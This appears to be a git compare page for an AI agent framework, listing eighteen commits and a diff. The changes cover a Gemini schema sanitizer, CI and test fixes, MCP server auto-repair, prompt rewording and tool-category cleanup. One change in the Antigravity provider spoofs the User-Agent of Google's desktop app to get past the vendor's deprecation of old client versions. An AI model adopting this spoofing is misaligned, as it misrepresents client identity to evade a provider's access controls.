Compare commits

...

18 Commits

Author SHA1 Message Date
Richard Tang fe74718fd9 chore: lint
CI / Lint Python (push) Waiting to run
CI / Test Python Framework (ubuntu-latest) (push) Waiting to run
CI / Test Python Framework (windows-latest) (push) Waiting to run
CI / Test Tools (ubuntu-latest) (push) Waiting to run
CI / Test Tools (windows-latest) (push) Waiting to run
CI / Validate Agent Exports (push) Blocked by required conditions
2026-05-04 17:57:56 -07:00
Richard Tang 07c97e2e9b feat: llm logging 2026-05-04 17:57:20 -07:00
Richard Tang 07600c5ab5 feat: encourage action plan prompts 2026-05-04 17:55:44 -07:00
Richard Tang e7d4ce0057 chore: lint 2026-05-04 12:36:28 -07:00
Richard Tang d9813288d9 fix: install system mcp when they fail 2026-05-04 12:35:21 -07:00
Richard Tang 41fbdcb940 fix(frontend): mcp tools server title format 2026-05-04 12:35:21 -07:00
Hundao 4a9b22719b fix(antigravity): unblock Gemini chats — schema sanitizer + UA bump (#7170)
* fix(antigravity): translate JSON Schema unions to Gemini nullable

Tool parameter schemas using JSON Schema 2020-12 unions like
"type": ["string", "null"] crash Gemini's function_declarations parser
with HTTP 400. Two existing tools trip this:

- core/framework/tasks/tools/colony_tools.py:52 (owner in _update_schema)
- core/framework/tasks/tools/session_tools.py:84-87 (same shape)

Add an adapter-level sanitizer that walks the schema tree and converts
union-with-null to OpenAPI 3.0 "nullable": true (which Gemini accepts).
Recurses into properties, items, additionalProperties, and the
anyOf/oneOf/allOf combinators. Source schemas remain valid JSON Schema
so OpenAI/Anthropic backends are unaffected.
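The translation rule can be sketched as follows (a minimal illustration, not the adapter's actual function — the real sanitizer also recurses into `items`, `additionalProperties`, and the combinators, and maps pure-null types to string-nullable):

```python
def sanitize(schema):
    """Translate a JSON Schema union-with-null into OpenAPI 3.0 nullable form."""
    if not isinstance(schema, dict):
        return schema
    out = dict(schema)
    t = out.get("type")
    if isinstance(t, list):
        non_null = [x for x in t if x != "null"]
        if len(non_null) == 1:
            # ["string", "null"] -> type "string" + nullable: true
            out["type"] = non_null[0]
            if "null" in t:
                out["nullable"] = True
        else:
            # Anything else (multi-type non-null unions) has no faithful
            # Gemini equivalent: fail loud so the schema author rewrites it.
            raise ValueError(f"Unsupported Gemini schema union: {t!r}")
    if isinstance(out.get("properties"), dict):
        out["properties"] = {k: sanitize(v) for k, v in out["properties"].items()}
    return out

print(sanitize({"type": "object", "properties": {"owner": {"type": ["string", "null"]}}}))
# {'type': 'object', 'properties': {'owner': {'type': 'string', 'nullable': True}}}
```

The source schema is left untouched (the sanitizer copies each dict), which is why the OpenAI/Anthropic code paths see valid JSON Schema unchanged.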

* fix(antigravity): bump spoofed UA past Google's deprecation cutoff

Google has deprecated client version "Antigravity/1.18.3" — chats now
return "This version of Antigravity is no longer supported" instead of
a real model response.

Bump the spoofed User-Agent to "Antigravity/1.23.2" + "Electron/39.2.3"
(current desktop release) and add a comment that this needs periodic
re-bumping. A more durable fix (auto-detect from the installed app's
Info.plist) is a follow-up.

* fix(antigravity): fail loud on multi-type non-null Gemini schema unions

Per review on PR #7170: silently picking the first type from a union
like ["string", "integer", "null"] changes the contract for callers
that rely on the other types, and the failure is hard to diagnose on
the Gemini side. Replace the silent narrowing with a ValueError that
points the schema author at anyOf or a single type.

A repo scan finds no current Gemini-bound schemas using multi-type
non-null unions, so this branch is preventative for future authors.

* chore(antigravity): drop em dash from test docstring
2026-05-05 01:16:48 +08:00
Hundao 8cb0531959 fix(ci): unblock main CI, sort imports + install Playwright Chromium (#7172)
* fix(lint): organize imports in queen_orchestrator.create_queen

Ruff I001 blocks CI on every PR against main. The deferred imports
inside create_queen were not in alphabetical order between the queen
package and the framework package; ruff auto-fix moves
framework.config below the framework.agents.queen.nodes block.

No behavior change.

* fix(ci): install Playwright Chromium before Test Tools job

The new chart_tools smoke tests added in feabf327 require a Chromium
build for ECharts/Mermaid rendering, but the test-tools workflow only
ran `uv sync` and went straight to pytest. Three tests
(test_render_echarts_bar_chart, test_render_echarts_accepts_string_spec,
test_render_mermaid_flowchart) crash on every PR with:

    BrowserType.launch: Executable doesn't exist at
    /home/runner/.cache/ms-playwright/chromium_headless_shell-1208/...

Split the install/run into separate steps and add `playwright install
chromium` before pytest. Use `--with-deps` on Linux to pull system
libraries; Windows runners only need the browser binary.

* fix(tests): adapt test_file_state_cache to new file_ops API

The file_ops rewrite in feabf327 dropped the standalone hashline_edit
tool (the file_system_toolkits/hashline_edit/ directory was removed)
and switched edit_file to a mode-first signature
(mode, path, old_string, new_string, ...).

The test fixture still tried to look up "hashline_edit" via the MCP
tool manager and crashed with KeyError before any test could run, and
the edit_file calls were positional in the old order so they hit
"unknown mode 'e.py'" once the fixture was fixed.

Drop the stale hashline_edit lookup and pass mode="replace" explicitly
to every edit_file call. All 11 tests pass locally.
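The failure mode can be illustrated with a stub (hypothetical — the real edit_file performs actual file I/O and takes more parameters; only the mode-first ordering is taken from the commit):

```python
def edit_file(mode, path, old_string=None, new_string=None):
    """Stub mirroring the mode-first signature of the rewritten edit_file tool."""
    if mode not in ("replace", "patch"):
        raise ValueError(f"unknown mode {mode!r}")
    return {"mode": mode, "path": path}

# The old positional order (path first) now lands the path in `mode`:
try:
    edit_file("e.py", "old text", "new text")
except ValueError as exc:
    print(exc)  # unknown mode 'e.py'

# Fixed call: pass mode explicitly, as the updated tests now do.
edit_file(mode="replace", path="e.py", old_string="old text", new_string="new text")
```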

* fix(tests): skip terminal_tools tests on Windows (POSIX-only)

The new terminal_tools package added in feabf327 imports the Unix-only
`resource` module in tools/src/terminal_tools/common/limits.py to set
RLIMIT_CPU / RLIMIT_AS / RLIMIT_FSIZE on subprocesses. Five of the
six terminal_tools test files therefore crash on windows-latest with
`ModuleNotFoundError: No module named 'resource'` once their fixtures
trigger the import chain.

test_terminal_tools_pty.py already has the right module-level skip
(PTY is POSIX-only). Apply the same `pytestmark = skipif(win32)` to
the other five so the whole suite skips cleanly on Windows. The
terminal-tools package is bash-only by design (zsh is rejected at the
shell-resolver level), so a Windows port is out of scope.
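The underlying condition the skip guards against can be checked directly (illustrative — the actual test files use `pytestmark = pytest.mark.skipif(...)` at module level, matching test_terminal_tools_pty.py):

```python
import sys

WINDOWS = sys.platform == "win32"

# The Unix-only `resource` module is what the terminal_tools import chain
# pulls in (for RLIMIT_CPU / RLIMIT_AS / RLIMIT_FSIZE caps).
try:
    import resource  # noqa: F401
    have_resource = True
except ModuleNotFoundError:
    have_resource = False

# On POSIX it imports; on Windows it doesn't -- hence the module-level skip:
#     pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="POSIX-only")
assert have_resource == (not WINDOWS)
```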
2026-05-05 00:32:59 +08:00
Richard Tang feabf32768 fix: worker context token 2026-05-03 11:45:37 -07:00
Richard Tang eee55ea8c7 chore: fix wrong model name 2026-05-03 11:35:05 -07:00
Richard Tang 78fffa63ec chore: ci and release doc
Release / Create Release (push) Waiting to run
2026-05-01 18:06:39 -07:00
Richard Tang 9a75d45351 chore: lint 2026-05-01 17:53:44 -07:00
Timothy 3a94f52009 feat: sync tool result contentful display 2026-05-01 17:44:19 -07:00
Timothy 522e0f511e fix: y-axis 2026-05-01 15:48:36 -07:00
Timothy e6310f1243 fix: normalize chart spec in renderer 2026-05-01 15:36:09 -07:00
Richard Tang 12ffacccab feat: tools config frontend grouping and tools cleanup 2026-05-01 15:28:40 -07:00
Timothy 8c36b1575c Merge branch 'feature/merge-to-file-ops' into feat/file-ops 2026-05-01 14:57:21 -07:00
Richard Tang a09eac06f1 feat: improve web search and consolidate browser open 2026-05-01 14:55:20 -07:00
84 changed files with 3596 additions and 3017 deletions
-1
@@ -47,7 +47,6 @@
"Bash(grep -v ':0$')",
"Bash(curl -s -m 2 http://127.0.0.1:4002/sse -o /dev/null -w 'status=%{http_code} time=%{time_total}s\\\\n')",
"mcp__gcu-tools__browser_status",
"mcp__gcu-tools__browser_start",
"mcp__gcu-tools__browser_navigate",
"mcp__gcu-tools__browser_evaluate",
"mcp__gcu-tools__browser_screenshot",
@@ -214,7 +214,7 @@ Curated list of known browser automation edge cases with symptoms, causes, and f
| **Symptom** | `browser_open()` returns `"No group with id: XXXXXXX"` even though `browser_status` shows `running: true` |
| **Root Cause** | In-memory `_contexts` dict has a stale `groupId` from a Chrome tab group that was closed outside the tool (e.g. user closed the tab group) |
| **Detection** | `browser_status` returns `running: true` but `browser_open` fails with "No group with id" |
| **Fix** | Call `browser_stop()` to clear stale context from `_contexts`, then `browser_start()` again |
| **Fix** | Call `browser_stop()` to clear stale context from `_contexts`, then `browser_open(url)` to lazy-create a fresh one |
| **Code** | `tools/lifecycle.py:144-160` - `already_running` check uses cached dict without validating against Chrome |
| **Verified** | 2026-04-03 ✓ |
+16 -4
@@ -84,11 +84,23 @@ jobs:
with:
enable-cache: true
- name: Install dependencies and run tests
- name: Install dependencies
working-directory: tools
run: |
uv sync --extra dev
uv run pytest tests/ -v
run: uv sync --extra dev
- name: Install Playwright Chromium (Linux)
if: runner.os == 'Linux'
working-directory: tools
run: uv run playwright install --with-deps chromium
- name: Install Playwright Chromium (Windows)
if: runner.os == 'Windows'
working-directory: tools
run: uv run playwright install chromium
- name: Run tests
working-directory: tools
run: uv run pytest tests/ -v
validate:
name: Validate Agent Exports
+2 -2
@@ -407,7 +407,7 @@ Aden Hive supports **100+ LLM providers** via LiteLLM, giving users maximum flex
| **Anthropic** | Claude 3.5 Sonnet, Haiku, Opus | Default provider, best for reasoning |
| **OpenAI** | GPT-4, GPT-4 Turbo, GPT-4o | Function calling, vision |
| **OpenRouter** | Any OpenRouter catalog model | Uses `OPENROUTER_API_KEY` and `https://openrouter.ai/api/v1` |
| **Hive LLM** | `queen`, `kimi-2.5`, `GLM-5` | Uses `HIVE_API_KEY` and the Hive-managed endpoint |
| **Hive LLM** | `queen`, `kimi-k2.5`, `GLM-5` | Uses `HIVE_API_KEY` and the Hive-managed endpoint |
| **Google** | Gemini 1.5 Pro, Flash | Long context windows |
| **DeepSeek** | DeepSeek V3 | Cost-effective, strong reasoning |
| **Mistral** | Mistral Large, Medium, Small | Open weights, EU hosting |
@@ -435,7 +435,7 @@ DEFAULT_MODEL = "claude-haiku-4-5-20251001"
**Provider-Specific Notes**
- **OpenRouter**: store `provider` as `openrouter`, use the raw OpenRouter model ID in `model` (for example `x-ai/grok-4.20-beta`), and use `OPENROUTER_API_KEY`
- **Hive LLM**: store `provider` as `hive`, use Hive model names such as `queen`, `kimi-2.5`, or `GLM-5`, and use `HIVE_API_KEY`
- **Hive LLM**: store `provider` as `hive`, use Hive model names such as `queen`, `kimi-k2.5`, or `GLM-5`, and use `HIVE_API_KEY`
**For Development**
- Use cheaper/faster models (Haiku, GPT-4o-mini)
+3 -4
@@ -72,17 +72,16 @@ Register an MCP server as a tool source for your agent.
"cwd": "../tools",
"description": "Aden tools..."
},
"tools_discovered": 6,
"tools_discovered": 5,
"tools": [
"web_search",
"web_scrape",
"file_read",
"file_write",
"pdf_read",
"example_tool"
"pdf_read"
],
"total_mcp_servers": 1,
"note": "MCP server 'tools' registered with 6 tools. These tools can now be used in event_loop nodes."
"note": "MCP server 'tools' registered with 5 tools. These tools can now be used in event_loop nodes."
}
```
+19 -23
@@ -240,19 +240,15 @@ See "Independent execution" for the per-step flow and granularity rule.
## File I/O (files-tools MCP)
- read_file, write_file, edit_file, search_files
- edit_file covers single-file fuzzy find/replace (mode='replace', default) \
- edit_file covers single-file fuzzy find/replace (mode='replace', default) \
and multi-file structured patches (mode='patch'). Patch mode supports \
Update / Add / Delete / Move atomically across many files in one call.
- search_files covers grep/find/ls in one tool: target='content' to \
- search_files covers grep/find/ls in one tool: target='content' to \
search inside files, target='files' (with a glob like '*.py') to list \
or find files. Mtime-sorted in files mode.
or find files.
## Browser Automation (gcu-tools MCP)
- Use `browser_*` tools `browser_open(url)` is the cold-start entry point \
(lazy-creates the context; no `browser_start` first). Then `browser_navigate`, \
`browser_click`, `browser_type`, `browser_snapshot`, \
<!-- vision-only -->`browser_screenshot`, <!-- /vision-only -->`browser_scroll`, \
`browser_tabs`, `browser_close`, `browser_evaluate`, etc.
- Use `browser_*` tools. `browser_open(url)` is the cold-start entry point
- MUST follow the browser-automation skill protocol before using browser tools.
## Hand off to a colony
@@ -261,9 +257,7 @@ or find files. Mtime-sorted in files mode.
chat. It does NOT fork on its own; it spawns a one-shot evaluator \
that reads this conversation and decides whether the spec is settled \
enough to proceed. On approval your phase flips to INCUBATING and a \
new tool surface (including create_colony itself) unlocks. On \
rejection you stay here and keep the conversation going to fill the \
gaps the evaluator named.
new tool surface (including create_colony itself) unlocks.
"""
_queen_tools_incubating = """
@@ -411,17 +405,19 @@ asks for specifics. Do not invent a new pass unless the user asks for one.
_queen_behavior_independent = """
## Independent execution
You are the agent. **For multi-step work (2+ atomic actions): call \
`task_create_batch`** with one entry per atomic action, \
before you touch any other tool. \
Then work the list one task at a time:
You are the agent. You behave this way:
1. Identify whether the user's prompt is a task assignment. If it is, \
use ask_user to clarify the scope and detail requirements, then always use \
`task_create_batch` to create a multi-step action plan.
1. `task_update` in_progress before you start the step.
2. Do one real inline instance open the browser, call the real API, \
2. `task_update` in_progress before you start the step.
3. Do one real inline instance - either open the browser, call the real API, \
write to the real file. If the action is irreversible or touches \
shared systems, show and confirm before executing. Report concrete \
evidence (actual output, what worked / failed) after the run.
3. `task_update` completed THE MOMENT it's done. **Do not let \
4. `task_update` completed THE MOMENT it's done. **Do not let \
multiple finished tasks pile up unmarked.** There is no batch update \
tool by design; each `completed` transition is a discrete progress \
heartbeat in the user's right-rail panel. Without those transitions \
@@ -430,14 +426,14 @@ done.
**Granularity: one task per atomic action, not one umbrella per project.** \
Once finishing all current tasks, discuss with user about building \
a colony so this sucess can be repeated or scaled
Once finishing a current task, discuss with the user about building \
a colony so this successful outcome can be repeated or scaled
### How to handle large scale tasks
If the user ask you to finish the same task repeatly or at large scale \
(more than 10 times), tell the user that you can do it once first then \
If the user asks you to finish the same task repeatedly or at large scale \
(more than 3 times), tell the user that you can do it once first then \
build a colony to fulfill the request but succeeding it once will be \
beneficial to run it in the future, \
beneficial to transfer it to a swarm of workers (through start_incubating_colony), \
then focus on finishing the task once first.
### How to handle simple tasks (fewer than 2 atomic items)
@@ -88,7 +88,6 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
"browser_basic": [
"browser_setup",
"browser_status",
"browser_start",
"browser_stop",
"browser_tabs",
"browser_open",
@@ -130,10 +129,7 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
# Research — paper search, Wikipedia, ad-hoc web scrape. Pair with
# browser_basic for richer site-by-site research; this category is the
# lightweight always-available fallback.
"research": [
"web_scrape",
"pdf_read"
],
"research": ["web_scrape", "pdf_read"],
# Security — defensive scanning and reconnaissance. Engineering-only
# surface; the rest of the queens shouldn't see port scanners.
"security": [
@@ -146,7 +142,7 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
"risk_score",
],
# Lightweight context helpers — good default for every queen.
"time_context": [
"context_awareness": [
"get_current_time",
"get_account_info",
],
@@ -182,7 +178,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Growth — data, experiments, competitor research; no security.
@@ -192,7 +188,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Product Strategy — user research + roadmaps; no security.
@@ -202,7 +198,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Finance — financial models (CSV/Excel heavy), market research.
@@ -213,7 +209,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Legal — reads contracts/PDFs, researches; no data/security.
@@ -223,7 +219,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
],
# Head of Brand & Design — visual refs, style guides; no data/security.
"queen_brand_design": [
@@ -232,17 +228,16 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
],
# Head of Talent — candidate pipelines, resumes; data + browser heavy.
"queen_talent": [
"file_ops",
"terminal_basic",
"spreadsheet_advanced",
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
],
# Head of Operations — processes, automation, observability.
"queen_operations": [
@@ -251,7 +246,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"spreadsheet_advanced",
"browser_basic",
"browser_interaction",
"time_context",
"context_awareness",
"charts",
],
}
@@ -17,7 +17,7 @@ Use browser nodes (with `tools: {policy: "all"}`) when:
## Available Browser Tools
All tools are prefixed with `browser_`:
- `browser_open`, `browser_navigate` preferred entry points; both lazy-create a browser context, so a single `browser_open(url)` covers the cold path. Use `browser_start` only to warm a profile without a URL or to recreate a context after `browser_stop`.
- `browser_open`, `browser_navigate` — both lazy-create the browser context, so a single `browser_open(url)` covers the cold path. To recover from a stale context, call `browser_stop` then `browser_open(url)` again.
- `browser_click`, `browser_click_coordinate`, `browser_type`, `browser_type_focused` — interact
- `browser_press` (with optional `modifiers=["ctrl"]` etc.) — keyboard shortcuts
- `browser_snapshot` — compact accessibility-tree read (structured)
+1 -1
@@ -7,7 +7,7 @@ verify SOP gates before marking a task done. This gives cross-run memory
that the existing per-iteration stall detectors don't have.
The DB is driven by agents via the ``sqlite3`` CLI through
``execute_command_tool``. This module handles framework-side lifecycle:
``terminal_exec``. This module handles framework-side lifecycle:
creation, migration, queen-side bulk seeding, stale-claim reclamation.
Concurrency model:
+61 -7
@@ -61,10 +61,12 @@ _IDE_STATE_DB_KEY = "antigravityUnifiedStateSync.oauthToken"
_BASE_HEADERS: dict[str, str] = {
# Mimic the Antigravity Electron app so the API accepts the request.
# Google deprecates older client versions over time, so this needs periodic
# bumping to match whatever the current Antigravity desktop release advertises.
"User-Agent": (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
"(KHTML, like Gecko) Antigravity/1.18.3 Chrome/138.0.7204.235 "
"Electron/37.3.1 Safari/537.36"
"(KHTML, like Gecko) Antigravity/1.23.2 Chrome/138.0.7204.235 "
"Electron/39.2.3 Safari/537.36"
),
"X-Goog-Api-Client": "google-cloud-sdk vscode_cloudshelleditor/0.1",
"Client-Metadata": '{"ideType":"ANTIGRAVITY","platform":"MACOS","pluginType":"GEMINI"}',
@@ -254,6 +256,56 @@ def _clean_tool_name(name: str) -> str:
return name[:64]
def _sanitize_schema_for_gemini(schema: Any) -> Any:
"""Convert JSON Schema 2020-12 features to the OpenAPI 3.0 dialect Gemini accepts.
Gemini's function_declarations parser rejects union ``"type": ["string", "null"]``.
Translate any such union to a single type plus ``"nullable": true``. Recurse into
``properties``, ``items``, and the ``anyOf``/``oneOf``/``allOf`` combinators.
"""
if isinstance(schema, list):
return [_sanitize_schema_for_gemini(s) for s in schema]
if not isinstance(schema, dict):
return schema
out = dict(schema)
t = out.get("type")
if isinstance(t, list):
non_null = [x for x in t if x != "null"]
has_null = "null" in t
if len(non_null) == 1:
out["type"] = non_null[0]
if has_null:
out["nullable"] = True
elif not non_null and has_null:
# Pure null type: fall back to string-nullable.
out["type"] = "string"
out["nullable"] = True
else:
# Multi-type non-null unions (e.g. ["string", "integer", "null"])
# have no faithful Gemini equivalent. Silently picking one type
# changes the contract for callers who rely on the others, so
# fail loud and let the schema author rewrite it as anyOf or
# narrow to a single type.
raise ValueError(
f"Unsupported Gemini schema union: {t!r}. "
"Gemini accepts a single primitive type plus optional 'nullable: true'. "
"Rewrite as anyOf or pick a single type."
)
if "properties" in out and isinstance(out["properties"], dict):
out["properties"] = {k: _sanitize_schema_for_gemini(v) for k, v in out["properties"].items()}
if "items" in out:
out["items"] = _sanitize_schema_for_gemini(out["items"])
if "additionalProperties" in out and isinstance(out["additionalProperties"], dict):
out["additionalProperties"] = _sanitize_schema_for_gemini(out["additionalProperties"])
for combinator in ("anyOf", "oneOf", "allOf"):
if combinator in out:
out[combinator] = _sanitize_schema_for_gemini(out[combinator])
return out
def _to_gemini_contents(
messages: list[dict[str, Any]],
thought_sigs: dict[str, str] | None = None,
@@ -555,11 +607,13 @@ class AntigravityProvider(LLMProvider):
{
"name": _clean_tool_name(t.name),
"description": t.description,
"parameters": t.parameters
or {
"type": "object",
"properties": {},
},
"parameters": _sanitize_schema_for_gemini(
t.parameters
or {
"type": "object",
"properties": {},
}
),
}
for t in tools
]
-4
@@ -2346,10 +2346,6 @@ class LiteLLMProvider(LLMProvider):
kwargs["extra_body"]["store"] = False
request_summary = _summarize_request_for_log(kwargs)
logger.debug(
"[stream] prepared request: %s",
json.dumps(request_summary, default=str),
)
if request_summary["system_only"]:
logger.warning(
"[stream] %s request has no non-system chat messages "
+3 -3
@@ -326,7 +326,7 @@
"supports_vision": false
},
{
"id": "kimi-2.5",
"id": "kimi-k2.5",
"label": "Kimi 2.5 - Via Hive",
"recommended": false,
"max_tokens": 32768,
@@ -489,8 +489,8 @@
"recommended": true
},
{
"id": "kimi-2.5",
"label": "kimi-2.5",
"id": "kimi-k2.5",
"label": "kimi-k2.5",
"recommended": false
},
{
+117 -2
@@ -52,11 +52,11 @@ _DEFAULT_LOCAL_SERVERS: dict[str, dict[str, Any]] = {
"args": ["run", "python", "files_server.py", "--stdio"],
},
"terminal-tools": {
"description": "Terminal capabilities: process exec, background jobs, PTY sessions, fs search. Bash-only on POSIX.",
"description": "Terminal capabilities",
"args": ["run", "python", "terminal_tools_server.py", "--stdio"],
},
"chart-tools": {
"description": "BI/financial chart + diagram rendering: ECharts, Mermaid. Returns spec + downloadable PNG; chat embeds live.",
"description": "BI/financial chart + diagram rendering: ECharts, Mermaid",
"args": ["run", "python", "chart_tools_server.py", "--stdio"],
},
}
@@ -137,6 +137,13 @@ class MCPRegistry:
Skips entirely when the source-tree ``tools/`` directory cannot
be located (e.g. wheel installs). Returns the list of names that
were newly registered.
Also runs a self-heal pass over already-registered defaults: if an
entry's stdio cwd is unreachable on this machine (e.g. the registry
was copied from another developer's box and points at their
``/Users/<them>/...`` path), the entry is overwritten with the
canonical config so the queen can actually spawn it. The user's
``enabled`` toggle and ``overrides`` are preserved.
"""
# parents: [0]=loader, [1]=framework, [2]=core, [3]=repo root
tools_dir = Path(__file__).resolve().parents[3] / "tools"
@@ -165,8 +172,31 @@ class MCPRegistry:
)
del existing[stale]
mutated = True
repaired: list[str] = []
for name, spec in _DEFAULT_LOCAL_SERVERS.items():
entry = existing.get(name)
if entry is None:
continue
if self._default_entry_runnable(entry, tools_dir, list(spec["args"])):
continue
existing[name] = self._build_default_entry(
name=name,
spec=spec,
cwd=cwd,
preserve_from=entry,
)
repaired.append(name)
mutated = True
if mutated:
self._write_installed(data)
if repaired:
logger.warning(
"MCPRegistry._seed_defaults: repaired %d default server(s) with unreachable cwd/script: %s",
len(repaired),
repaired,
)
for name, spec in _DEFAULT_LOCAL_SERVERS.items():
if name in existing:
@@ -188,6 +218,91 @@ class MCPRegistry:
logger.info("MCPRegistry: seeded default local servers: %s", added)
return added
@staticmethod
def _default_entry_runnable(entry: dict, tools_dir: Path, canonical_args: list[str]) -> bool:
"""Return True iff ``entry`` can plausibly be spawned on this machine.
Checks:
- transport is stdio (only stdio defaults exist today; non-stdio
gets a free pass since we have nothing to compare against)
- stdio.cwd is an existing directory
- the entry script (the first ``.py`` arg, e.g. ``files_server.py``)
exists relative to that cwd
We deliberately do NOT spawn the subprocess here; this runs on
every read path and must be cheap. A filesystem reachability
check catches the cross-machine `cwd` drift that is the common
failure, without flapping on transient runtime errors.
"""
transport = entry.get("transport") or "stdio"
if transport != "stdio":
return True
manifest = entry.get("manifest") or {}
stdio = manifest.get("stdio") or {}
cwd_str = stdio.get("cwd")
if not cwd_str:
return False
cwd_path = Path(cwd_str)
if not cwd_path.is_dir():
return False
# Find the script: the first arg ending in .py, falling back to the
# canonical spec if the registered args are unrecognizable. Modules
# invoked via `python -m foo.bar` (no .py arg) are accepted as long
# as the cwd exists — we can't cheaply prove the module imports.
registered_args = stdio.get("args") or []
script: str | None = next(
(a for a in registered_args if isinstance(a, str) and a.endswith(".py")),
None,
)
if script is None:
script = next(
(a for a in canonical_args if isinstance(a, str) and a.endswith(".py")),
None,
)
if script is None:
return True
return (cwd_path / script).is_file()
@classmethod
def _build_default_entry(
cls,
*,
name: str,
spec: dict[str, Any],
cwd: str,
preserve_from: dict | None,
) -> dict:
"""Construct a fresh canonical entry for a default server.
When ``preserve_from`` is provided, carries over the user's
``enabled`` flag and ``overrides`` so a deliberate disable or
custom env var survives the repair.
"""
manifest = {
"name": name,
"description": spec["description"],
"transport": {"supported": ["stdio"], "default": "stdio"},
"stdio": {
"command": "uv",
"args": list(spec["args"]),
"env": {},
"cwd": cwd,
},
}
entry = cls._make_entry(
source="local",
manifest=manifest,
transport="stdio",
installed_by="hive mcp init (auto-repair)",
)
if preserve_from is not None:
if "enabled" in preserve_from:
entry["enabled"] = bool(preserve_from["enabled"])
prior_overrides = preserve_from.get("overrides")
if isinstance(prior_overrides, dict):
entry["overrides"] = prior_overrides
return entry
# ── Internal I/O ────────────────────────────────────────────────
def _read_installed(self) -> dict:
+1 -1
@@ -158,7 +158,7 @@ cookie consent banners if they block content.
- If `browser_snapshot` fails, try `browser_get_text` with a narrow
selector as fallback.
- If `browser_open` fails or the page seems stale, `browser_stop`
`browser_start` retry.
`browser_open(url)` to lazy-create a fresh context.
## `browser_evaluate`
+4 -5
@@ -683,11 +683,10 @@ class Orchestrator:
# Set per-execution data_dir and agent_id so data tools and
# spillover files share the same session-scoped directory, and
# so MCP tools whose server-side schemas mark agent_id as a
# required field (execute_command_tool's bash_*, etc.) get a valid
# value injected even on
# registry instances where agent_loader.setup() didn't populate
# the session_context. Without this, FastMCP rejects those
# calls with "agent_id is a required property".
# required field get a valid value injected even on registry
# instances where agent_loader.setup() didn't populate the
# session_context. Without this, FastMCP rejects those calls
# with "agent_id is a required property".
_ctx_token = None
if self._storage_path:
from framework.loader.tool_registry import ToolRegistry
+7 -1
@@ -377,6 +377,7 @@ async def create_queen(
_queen_tools_working,
finalize_queen_prompt,
)
from framework.config import get_max_tokens as _get_max_tokens
from framework.host.event_bus import AgentEvent, EventType
from framework.llm.capabilities import supports_image_tool_results
from framework.loader.mcp_registry import MCPRegistry
@@ -982,7 +983,12 @@ async def create_queen(
llm=session.llm,
available_tools=queen_tools,
goal_context=queen_goal.to_prompt_context(),
max_tokens=lc.get("max_tokens", 8192),
# Honor configuration.json (llm.max_tokens) instead of
# hard-defaulting to 8192. The legacy fallback ignored both
# the user's saved ceiling AND the model's actual output
# capacity (e.g. glm-5.1 / kimi-k2.5 both support 32k out),
# which silently truncated long tool-emitting turns.
max_tokens=lc.get("max_tokens", _get_max_tokens()),
stream_id="queen",
execution_id=session.id,
dynamic_tools_provider=phase_state.get_current_tools,
@@ -235,10 +235,6 @@ _SYSTEM_TOOLS: frozenset[str] = frozenset(
{
"get_account_info",
"get_current_time",
"bash_kill",
"bash_output",
"execute_command_tool",
"example_tool",
}
)
+5 -2
@@ -19,7 +19,7 @@ from datetime import datetime
from pathlib import Path
from typing import Any, Literal
from framework.config import QUEENS_DIR
from framework.config import QUEENS_DIR, get_max_tokens
from framework.host.triggers import TriggerDefinition
logger = logging.getLogger(__name__)
@@ -700,7 +700,10 @@ class SessionManager:
available_tools=all_tools,
goal_context=goal.to_prompt_context(),
goal=goal,
max_tokens=8192,
# Worker output cap — pull from configuration.json instead of
# hard-coding 8192. glm-5.1/kimi-k2.5 both support 32k out, and
# capping at 8k silently truncates long worker turns mid-tool.
max_tokens=get_max_tokens(),
stream_id=worker_name,
execution_id=worker_name,
identity_prompt=worker_data.get("identity_prompt", ""),
@@ -11,7 +11,7 @@ metadata:
**Applies when** your spawn message has `db_path:` and `colony_id:` fields. The DB is your durable working memory — tells you what's done, what to skip, which SOP gates you owe.
Access via `execute_command_tool` running `sqlite3 "<db_path>" "..."`. Tables: `tasks` (queue), `steps` (per-task decomposition), `sop_checklist` (hard gates).
Access via `terminal_exec` running `sqlite3 "<db_path>" "..."`. Tables: `tasks` (queue), `steps` (per-task decomposition), `sop_checklist` (hard gates).
### Claim: assigned task (check this FIRST)
@@ -410,7 +410,7 @@ In all of these cases the script is SHORT (< 10 lines) and the result is CONSUME
- If a tool fails, retry once with the same approach.
- If it fails a second time, STOP retrying and switch approach.
- If `browser_snapshot` fails, try `browser_get_text` with a specific small selector as fallback.
- If `browser_open` fails or page seems stale, `browser_stop`, then `browser_start`, then retry.
- If `browser_open` fails or page seems stale, `browser_stop`, then `browser_open(url)` again to recreate a fresh context.
## Verified workflows
+85 -23
@@ -1,11 +1,22 @@
"""Write every LLM turn to ~/.hive/llm_logs/<ts>.jsonl for replay/debugging.
Each line is a JSON object with the full LLM turn: the request payload
(system prompt + messages), assistant text, tool calls, tool results, and
token counts. The file is opened lazily on first call and flushed after every
write. Errors are silently swallowed this must never break the agent.
Two record kinds, distinguished by ``_kind``:
* ``session_header`` emitted on the first turn of an ``execution_id`` and
any time its ``system_prompt`` or ``tools`` change. Carries those large
fields once instead of per-turn.
* ``turn``: one per LLM call. Carries per-turn outputs plus a
content-addressed message delta: ``message_hashes`` is the full ordered
message sequence for this turn, ``new_messages`` maps hash to body for
messages we haven't emitted before for this ``execution_id``. The reader
reassembles full ``messages`` by accumulating ``new_messages`` across
